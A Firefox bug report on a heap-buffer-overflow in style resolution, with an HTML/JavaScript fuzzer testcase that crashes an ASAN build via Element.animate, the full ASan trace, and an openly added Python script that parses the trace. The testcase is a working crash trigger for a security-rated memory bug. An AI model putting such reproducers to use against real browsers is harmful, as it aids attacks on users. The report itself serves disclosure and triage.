Bug 1333544 (closed): heap-buffer-overflow in nsStyleSet::FileRules

Opened 7 years ago; closed 7 years ago. Status: RESOLVED DUPLICATE of bug 1331704.
Product / Component: Core :: DOM: Animation
Type: defect; Priority: Not set; Severity: normal
Tracking status: firefox54 --- affected
Reporter: nils; Assignee: Unassigned
Keywords: crash, sec-high, testcase

The following testcase crashes the latest ASAN build of Firefox (BuildID=20170124025447):

<script>
function start() {
        o10=document.createElement('style');
        document.documentElement.appendChild(o10);
        o18=document.createTextNode("*{ bottom: auto!important");
        o10.appendChild(o18);
        o85=document.createElement('head');
        document.documentElement.appendChild(o85);
        o86=document.createElement('style');
        o85.appendChild(o86);
        o92=document.createElement('link');
        o85.animate([{MozFloatEdge: 'content-box'},{objectFit: 'contain',MozFloatEdge: 'content-box',listStylePosition: 'outside'}],3);
        o86.appendChild(o92);
        o92.animate([{all: 'initial',listStyleImage: 'none'}],4);
        o92.animate([{}],4);
}
</script>
<body onload="start()"></body>


=================================================================
==8638==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60700013d0e8 at pc 0x7f9e7e741f6a bp 0x7ffc561069f0 sp 0x7ffc561069e8
READ of size 8 at 0x60700013d0e8 thread T0 (Web Content)
    #0 0x7f9e7e741f69 in get /home/worker/workspace/build/src/obj-firefox/dist/include/nsAutoPtr.h:171:12
    #1 0x7f9e7e741f69 in operator nsCSSCompressedDataBlock * /home/worker/workspace/build/src/obj-firefox/dist/include/nsAutoPtr.h:185
    #2 0x7f9e7e741f69 in HasImportantData /home/worker/workspace/build/src/layout/style/Declaration.h:137
    #3 0x7f9e7e741f69 in GetImportantStyleData /home/worker/workspace/build/src/layout/style/Declaration.h:304
    #4 0x7f9e7e741f69 in nsStyleSet::AddImportantRules(nsRuleNode*, nsRuleNode*, nsRuleWalker*) /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:1043
    #5 0x7f9e7e742e11 in nsStyleSet::FileRules(bool (*)(nsIStyleRuleProcessor*, void*), RuleProcessorData*, mozilla::dom::Element*, nsRuleWalker*) /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:1221:5
    #6 0x7f9e7e7454b1 in nsStyleSet::ResolveStyleForInternal(mozilla::dom::Element*, nsStyleContext*, TreeMatchContext&, nsStyleSet::AnimationFlag) /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:1367:3
    #7 0x7f9e7e744dec in ResolveStyleFor /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:1403:10
    #8 0x7f9e7e744dec in nsStyleSet::ResolveStyleFor(mozilla::dom::Element*, nsStyleContext*) /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:1350
    #9 0x7f9e7e57573c in ResolveStyleFor /home/worker/workspace/build/src/layout/style/nsStyleSet.h:121:12
    #10 0x7f9e7e57573c in ResolveStyleFor /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/StyleSetHandleInlines.h:85
    #11 0x7f9e7e57573c in ResolveWithAnimation /home/worker/workspace/build/src/layout/style/nsComputedDOMStyle.cpp:499
    #12 0x7f9e7e57573c in nsComputedDOMStyle::DoGetStyleContextForElementNoFlush(mozilla::dom::Element*, nsIAtom*, nsIPresShell*, nsComputedDOMStyle::StyleType, nsComputedDOMStyle::AnimationFlag) /home/worker/workspace/build/src/layout/style/nsComputedDOMStyle.cpp:656
    #13 0x7f9e7e574f25 in GetStyleContextForElementNoFlush /home/worker/workspace/build/src/layout/style/nsComputedDOMStyle.cpp:677:10
    #14 0x7f9e7e574f25 in nsComputedDOMStyle::GetStyleContextForElement(mozilla::dom::Element*, nsIAtom*, nsIPresShell*, nsComputedDOMStyle::StyleType) /home/worker/workspace/build/src/layout/style/nsComputedDOMStyle.cpp:447
    #15 0x7f9e7a49b1ac in already_AddRefed<nsStyleContext> mozilla::dom::KeyframeEffectReadOnly::DoGetTargetStyleContext<(mozilla::dom::KeyframeEffectReadOnly::AnimationStyle)1>() /home/worker/workspace/build/src/dom/animation/KeyframeEffectReadOnly.cpp:925:12
    #16 0x7f9e7a497be3 in GetTargetStyleContext /home/worker/workspace/build/src/dom/animation/KeyframeEffectReadOnly.cpp:937:10
    #17 0x7f9e7a497be3 in mozilla::dom::KeyframeEffectReadOnly::SetKeyframes(JSContext*, JS::Handle<JSObject*>, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/animation/KeyframeEffectReadOnly.cpp:184
    #18 0x7f9e7a4917c8 in already_AddRefed<mozilla::dom::KeyframeEffect> mozilla::dom::KeyframeEffectReadOnly::ConstructKeyframeEffect<mozilla::dom::KeyframeEffect, mozilla::dom::UnrestrictedDoubleOrKeyframeAnimationOptions>(mozilla::dom::GlobalObject const&, mozilla::dom::Nullable<mozilla::dom::ElementOrCSSPseudoElement> const&, JS::Handle<JSObject*>, mozilla::dom::UnrestrictedDoubleOrKeyframeAnimationOptions const&, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/animation/KeyframeEffectReadOnly.cpp:767:3
    #19 0x7f9e7a490d9d in mozilla::dom::KeyframeEffect::Constructor(mozilla::dom::GlobalObject const&, mozilla::dom::Nullable<mozilla::dom::ElementOrCSSPseudoElement> const&, JS::Handle<JSObject*>, mozilla::dom::UnrestrictedDoubleOrKeyframeAnimationOptions const&, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/animation/KeyframeEffect.cpp:65:10
    #20 0x7f9e7a6ee37d in mozilla::dom::Element::Animate(mozilla::dom::Nullable<mozilla::dom::ElementOrCSSPseudoElement> const&, JSContext*, JS::Handle<JSObject*>, mozilla::dom::UnrestrictedDoubleOrKeyframeAnimationOptions const&, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/base/Element.cpp:3421:5
    #21 0x7f9e7a6edceb in mozilla::dom::Element::Animate(JSContext*, JS::Handle<JSObject*>, mozilla::dom::UnrestrictedDoubleOrKeyframeAnimationOptions const&, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/base/Element.cpp:3378:10
    #22 0x7f9e7be660b4 in mozilla::dom::ElementBinding::animate(JSContext*, JS::Handle<JSObject*>, mozilla::dom::Element*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/ElementBinding.cpp:3327:55
    #23 0x7f9e7c3230a0 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2914:13
    #24 0x7f9e81d6477c in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #25 0x7f9e81d6477c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:460
    #26 0x7f9e81d4a50e in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:511:12
    #27 0x7f9e81d4a50e in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2956
    #28 0x7f9e81d2e401 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:406:12
    #29 0x7f9e81d649fc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:478:15
    #30 0x7f9e81d650b2 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:524:10
    #31 0x7f9e825bf4ed in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2847:12
    #32 0x7f9e7be80f1f in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:259:37
    #33 0x7f9e7c7a5451 in Call<nsISupports *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:361:12
    #34 0x7f9e7c7a5451 in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:213
    #35 0x7f9e7c76f61d in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1136:16
    #36 0x7f9e7c77119c in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1318:20
    #37 0x7f9e7c75bf63 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:462:5
    #38 0x7f9e7c75f854 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:819:9
    #39 0x7f9e7e91b0c9 in nsDocumentViewer::LoadComplete(nsresult) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1024:7
    #40 0x7f9e7f7c541e in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7603:5
    #41 0x7f9e7f7c1354 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7407:7
    #42 0x7f9e7f7c88ff in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7304:13
    #43 0x7f9e798f0380 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1255:3
    #44 0x7f9e798ef318 in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:840:5
    #45 0x7f9e798ec081 in nsDocLoader::DocLoaderIsEmpty(bool) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:730:9
    #46 0x7f9e798ee174 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:612:5
    #47 0x7f9e798eed2c in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:468:14
    #48 0x7f9e780d354b in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:633:18
    #49 0x7f9e7a9074ab in nsDocument::DoUnblockOnload() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8694:7
    #50 0x7f9e7a9b132f in nsUnblockOnloadEvent::Run() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8645:5
    #51 0x7f9e77eecb3b in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1240:7
    #52 0x7f9e77f701bc in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/glue/nsThreadUtils.cpp:390:10
    #53 0x7f9e78d28f5f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #54 0x7f9e78c9b828 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3
    #55 0x7f9e78c9b828 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #56 0x7f9e78c9b828 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #57 0x7f9e7e0e53bf in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
    #58 0x7f9e802dc217 in XRE_RunAppShell() /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:927:12
    #59 0x7f9e78c9b828 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3
    #60 0x7f9e78c9b828 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #61 0x7f9e78c9b828 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #62 0x7f9e802dba3d in XRE_InitChildProcess(int, char**, XREChildData const*) /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:759:7
    #63 0x4df9d3 in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:115:19
    #64 0x4df9d3 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:284
    #65 0x7f9e9330c82f in __libc_start_main /build/glibc-t3gR2i/glibc-2.23/csu/../csu/libc-start.c:291
    #66 0x41baf8 in _start (/home/nils/fuzzer3/firefox/firefox+0x41baf8)

0x60700013d0e8 is located 8 bytes to the left of 80-byte region [0x60700013d0f0,0x60700013d140)
allocated by thread T0 (Web Content) here:
    #0 0x4b256b in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
    #1 0x4e0a4d in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7f9e7a4bd140 in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
    #3 0x7f9e7a4bd140 in mozilla::MakePropertyValuePair(nsCSSPropertyID, nsAString_internal const&, nsCSSParser&, nsIDocument*) /home/worker/workspace/build/src/dom/animation/KeyframeUtils.cpp:1061
    #4 0x7f9e7a4ac178 in ConvertKeyframeSequence /home/worker/workspace/build/src/dom/animation/KeyframeUtils.cpp:861:9
    #5 0x7f9e7a4ac178 in GetKeyframeListFromKeyframeSequence /home/worker/workspace/build/src/dom/animation/KeyframeUtils.cpp:769
    #6 0x7f9e7a4ac178 in mozilla::KeyframeUtils::GetKeyframesFromObject(JSContext*, nsIDocument*, JS::Handle<JSObject*>, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/animation/KeyframeUtils.cpp:460
    #7 0x7f9e7a497baf in mozilla::dom::KeyframeEffectReadOnly::SetKeyframes(JSContext*, JS::Handle<JSObject*>, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/animation/KeyframeEffectReadOnly.cpp:179:5
    #8 0x7f9e7a4917c8 in already_AddRefed<mozilla::dom::KeyframeEffect> mozilla::dom::KeyframeEffectReadOnly::ConstructKeyframeEffect<mozilla::dom::KeyframeEffect, mozilla::dom::UnrestrictedDoubleOrKeyframeAnimationOptions>(mozilla::dom::GlobalObject const&, mozilla::dom::Nullable<mozilla::dom::ElementOrCSSPseudoElement> const&, JS::Handle<JSObject*>, mozilla::dom::UnrestrictedDoubleOrKeyframeAnimationOptions const&, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/animation/KeyframeEffectReadOnly.cpp:767:3
    #9 0x7f9e7a490d9d in mozilla::dom::KeyframeEffect::Constructor(mozilla::dom::GlobalObject const&, mozilla::dom::Nullable<mozilla::dom::ElementOrCSSPseudoElement> const&, JS::Handle<JSObject*>, mozilla::dom::UnrestrictedDoubleOrKeyframeAnimationOptions const&, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/animation/KeyframeEffect.cpp:65:10
    #10 0x7f9e7a6ee37d in mozilla::dom::Element::Animate(mozilla::dom::Nullable<mozilla::dom::ElementOrCSSPseudoElement> const&, JSContext*, JS::Handle<JSObject*>, mozilla::dom::UnrestrictedDoubleOrKeyframeAnimationOptions const&, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/base/Element.cpp:3421:5
    #11 0x7f9e7a6edceb in mozilla::dom::Element::Animate(JSContext*, JS::Handle<JSObject*>, mozilla::dom::UnrestrictedDoubleOrKeyframeAnimationOptions const&, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/base/Element.cpp:3378:10
    #12 0x7f9e7be660b4 in mozilla::dom::ElementBinding::animate(JSContext*, JS::Handle<JSObject*>, mozilla::dom::Element*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/ElementBinding.cpp:3327:55
    #13 0x7f9e7c3230a0 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2914:13
    #14 0x7f9e81d6477c in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #15 0x7f9e81d6477c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:460
    #16 0x7f9e81d4a50e in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:511:12
    #17 0x7f9e81d4a50e in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2956
    #18 0x7f9e81d2e401 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:406:12
    #19 0x7f9e81d649fc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:478:15
    #20 0x7f9e81d650b2 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:524:10
    #21 0x7f9e825bf4ed in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2847:12
    #22 0x7f9e7be80f1f in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:259:37
    #23 0x7f9e7c7a5451 in Call<nsISupports *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:361:12
    #24 0x7f9e7c7a5451 in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:213
    #25 0x7f9e7c76f61d in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1136:16
    #26 0x7f9e7c77119c in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1318:20
    #27 0x7f9e7c75bf63 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:462:5
    #28 0x7f9e7c75f854 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:819:9
    #29 0x7f9e7e91b0c9 in nsDocumentViewer::LoadComplete(nsresult) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1024:7
    #30 0x7f9e7f7c541e in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7603:5
    #31 0x7f9e7f7c1354 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7407:7
    #32 0x7f9e7f7c88ff in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7304:13
    #33 0x7f9e798f0380 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1255:3
    #34 0x7f9e798ef318 in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:840:5
    #35 0x7f9e798ec081 in nsDocLoader::DocLoaderIsEmpty(bool) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:730:9

SUMMARY: AddressSanitizer: heap-buffer-overflow /home/worker/workspace/build/src/obj-firefox/dist/include/nsAutoPtr.h:171:12 in get
Shadow bytes around the buggy address:
  0x0c0e8001f9c0: fa fa fa fa fa fa fa fa fa fa 00 00 00 00 00 00
  0x0c0e8001f9d0: 00 00 00 00 fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c0e8001f9e0: 00 00 fa fa fa fa 00 00 00 00 00 00 00 00 00 fa
  0x0c0e8001f9f0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 fa fa
  0x0c0e8001fa00: fa fa 00 00 00 00 00 00 00 00 00 fa fa fa fa fa
=>0x0c0e8001fa10: 00 00 00 00 00 00 00 00 00 fa fa fa fa[fa]00 00
  0x0c0e8001fa20: 00 00 00 00 00 00 00 00 fa fa fa fa 00 00 00 00
  0x0c0e8001fa30: 00 00 00 00 00 00 fa fa fa fa fd fd fd fd fd fd
  0x0c0e8001fa40: fd fd fd fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c0e8001fa50: fd fa fa fa fa fa 00 00 00 00 00 00 00 00 00 00
  0x0c0e8001fa60: fa fa fa fa fd fd fd fd fd fd fd fd fd fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==8638==ABORTING
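The report above already contains everything needed to triage the crash: the faulting address is 8 bytes before an 80-byte allocation, the access is an 8-byte read through a smart-pointer accessor inlined into nsStyleSet::AddImportantRules, and the allocation came from MakePropertyValuePair in KeyframeUtils.cpp. The following Python script is an added example, not part of the bug report or of Firefox: it parses the report header, the access stack and the allocation stack, computes the offset of the access relative to the allocated region, and checks that the shadow byte ASan marks with `[fa]` in the dump is exactly the one for the faulting address. It assumes the default x86_64 Linux shadow mapping (shadow = (addr >> 3) + 0x7fff8000); the "first application frame" (first frame in a .cpp file) and "allocation site" (first frame that is not an allocator wrapper) rules are this example's own heuristics, and the embedded sample is a constructed excerpt of the report quoted on this page.

```python
import re

# Constructed sample input: the opening lines of each section of the ASan report
# quoted in this bug (the full trace is on the page; only these lines are needed).
ASAN_REPORT = """\
==8638==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60700013d0e8 at pc 0x7f9e7e741f6a bp 0x7ffc561069f0 sp 0x7ffc561069e8
READ of size 8 at 0x60700013d0e8 thread T0 (Web Content)
    #0 0x7f9e7e741f69 in get /home/worker/workspace/build/src/obj-firefox/dist/include/nsAutoPtr.h:171:12
    #1 0x7f9e7e741f69 in operator nsCSSCompressedDataBlock * /home/worker/workspace/build/src/obj-firefox/dist/include/nsAutoPtr.h:185
    #2 0x7f9e7e741f69 in HasImportantData /home/worker/workspace/build/src/layout/style/Declaration.h:137
    #3 0x7f9e7e741f69 in GetImportantStyleData /home/worker/workspace/build/src/layout/style/Declaration.h:304
    #4 0x7f9e7e741f69 in nsStyleSet::AddImportantRules(nsRuleNode*, nsRuleNode*, nsRuleWalker*) /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:1043

0x60700013d0e8 is located 8 bytes to the left of 80-byte region [0x60700013d0f0,0x60700013d140)
allocated by thread T0 (Web Content) here:
    #0 0x4b256b in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
    #1 0x4e0a4d in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7f9e7a4bd140 in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
    #3 0x7f9e7a4bd140 in mozilla::MakePropertyValuePair(nsCSSPropertyID, nsAString_internal const&, nsCSSParser&, nsIDocument*) /home/worker/workspace/build/src/dom/animation/KeyframeUtils.cpp:1061
"""

HEADER_RE = re.compile(
    r"==(?P<pid>\d+)==ERROR: AddressSanitizer: (?P<kind>[\w-]+) on address (?P<addr>0x[0-9a-f]+)")
ACCESS_RE = re.compile(
    r"^(?P<op>READ|WRITE) of size (?P<size>\d+) at (?P<addr>0x[0-9a-f]+) thread (?P<thread>T\d+)")
REGION_RE = re.compile(
    r"^(?P<addr>0x[0-9a-f]+) is located (?P<dist>\d+) bytes "
    r"(?:to the (?P<side>left|right) of|inside of) (?P<size>\d+)-byte region "
    r"\[(?P<start>0x[0-9a-f]+),(?P<end>0x[0-9a-f]+)\)")
# Function names may contain spaces ("operator nsCSSCompressedDataBlock *"); the
# source location is the last whitespace-free token on the line.
FRAME_RE = re.compile(r"^\s*#(?P<n>\d+) 0x[0-9a-f]+ in (?P<func>.+?) (?P<loc>\S+)$")

# Allocator wrappers skipped when looking for the application-level allocation site (heuristic).
ALLOCATOR_FUNCS = {"malloc", "calloc", "realloc", "moz_xmalloc", "operator new", "operator new[]"}

# Default ASan shadow mapping on x86_64 Linux (assumption): shadow = (addr >> 3) + offset.
SHADOW_OFFSET = 0x7FFF8000


def parse_asan_report(text):
    """Extract header, access details, region details and the per-section stacks."""
    report = {"frames": {"access": [], "allocation": [], "free": []}}
    section = None
    for line in text.splitlines():
        m = HEADER_RE.search(line)
        if m:
            report.update(pid=int(m["pid"]), kind=m["kind"], addr=int(m["addr"], 16))
            continue
        m = ACCESS_RE.match(line)
        if m:
            report.update(op=m["op"], size=int(m["size"]), thread=m["thread"])
            section = "access"
            continue
        m = REGION_RE.match(line)
        if m:
            report.update(region_start=int(m["start"], 16), region_end=int(m["end"], 16),
                          region_size=int(m["size"]), side=m["side"] or "inside",
                          distance=int(m["dist"]))
            continue
        if line.startswith("allocated by"):
            section = "allocation"
        elif line.startswith("freed by"):
            section = "free"
        else:
            m = FRAME_RE.match(line)
            if m and section:
                report["frames"][section].append((int(m["n"]), m["func"], m["loc"]))
    return report


def shadow_address(addr):
    """Address of the shadow byte covering addr (one shadow byte per 8 application bytes)."""
    return (addr >> 3) + SHADOW_OFFSET


def shadow_dump_position(addr):
    """Row address and column of addr's shadow byte in ASan's 16-bytes-per-row dump."""
    s = shadow_address(addr)
    return s & ~0xF, s & 0xF


def triage(text):
    r = parse_asan_report(text)
    offset = r["addr"] - r["region_start"]  # negative: the access lies before the allocation
    verdict = {"left": "underflow (access before the start of the allocation)",
               "right": "overflow (access past the end of the allocation)"}.get(
                   r["side"], "address inside the region")
    access = r["frames"]["access"]
    # Heuristic: the first frame in a .cpp/.cc file is the caller that dereferenced the pointer;
    # the frames above it are header-inlined accessors.
    app_frame = next((f for f in access if re.search(r"\.(?:cc|cpp|c):\d", f[2])), access[0])
    alloc_site = next((f for f in r["frames"]["allocation"] if f[1] not in ALLOCATOR_FUNCS), None)
    row, col = shadow_dump_position(r["addr"])
    return {
        "kind": r["kind"],
        "access": f"{r['op']} of {r['size']} bytes",
        "offset_from_region": offset,
        "region_size": r["region_end"] - r["region_start"],
        "verdict": verdict,
        "faulting_function": access[0][1],
        "first_app_frame": app_frame[1],
        "allocation_site": alloc_site[1] if alloc_site else None,
        "shadow_row": row,   # the "=>" row in the shadow dump
        "shadow_col": col,   # the bracketed byte within that row
    }


if __name__ == "__main__":
    for key, value in triage(ASAN_REPORT).items():
        print(f"{key:>20}: {value:#x}" if key == "shadow_row" else f"{key:>20}: {value}")
```

For this report the script reports an 8-byte READ at offset -8 from the region, i.e. the `mImportantData` pointer is read from just before the start of an 80-byte object allocated by MakePropertyValuePair, and it places the shadow byte at row 0x0c0e8001fa10, column 13, which is the bracketed `fa` (heap left redzone) on the `=>` line of the dump. That agreement between the computed position and the marked byte is a quick sanity check that the report has not been truncated or mis-pasted before it is filed or deduplicated.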
Group: core-security → dom-core-security
Keywords: crash, sec-high, testcase
This is essentially the same problem as bug 1331704.
Status: NEW → RESOLVED
Closed: 7 years ago
Resolution: --- → DUPLICATE
Group: dom-core-security